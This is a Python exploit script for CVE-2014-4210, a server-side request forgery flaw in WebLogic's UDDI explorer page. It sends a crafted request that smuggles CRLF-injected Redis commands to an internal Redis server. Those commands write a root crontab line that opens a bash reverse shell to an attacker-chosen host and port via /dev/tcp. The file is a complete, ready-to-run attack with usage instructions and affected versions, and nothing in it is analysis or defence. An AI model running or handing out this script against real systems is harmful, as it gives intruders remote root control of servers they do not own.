cve-2014-4210_ssrf_redis_shell.py

#!/usr/bin/env python  
# -*- coding: utf-8 -*-

import sys
import requests
import time

def shell(weblogic_ip,weblogic_port,inside_ip,inside_port,nc_ip,nc_port):
	exp_url = "http://{}:{}/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://{}:{}/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{}%2F{}%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa".format(weblogic_ip,weblogic_port,inside_ip,inside_port,nc_ip,nc_port)
	try:
		response = requests.get(exp_url,timeout=5,verify=False)
		print "[+]please wait a monment"
		time.sleep(3)
		print "[+]Then check you vps if or not get a rebound shell!"
	
	except Exception,e:
		print e
		print "[-]maybe Rebound shell failed!"

if __name__=="__main__":
	if len(sys.argv)!= 7:
		print("+---------------------------------------------------------------------------------------------------+")
		print("+ USE: python <filename> <weblogic_ip> <weblogic_port> <inside_ip> <inside_port> <nc_ip> <nc_port>  +")
		print("+ EXP: python filename.py 1.1.1.1 7001 192.168.1.1 6379 2.2.2.2 5555                                +")
		print("+ VER: 10.0.2,10.3.6                                                                                +")
		print("+---------------------------------------------------------------------------------------------------+")
	else:
		shell(sys.argv[1],sys.argv[2],sys.argv[3],int(sys.argv[4]),sys.argv[5],int(sys.argv[6]))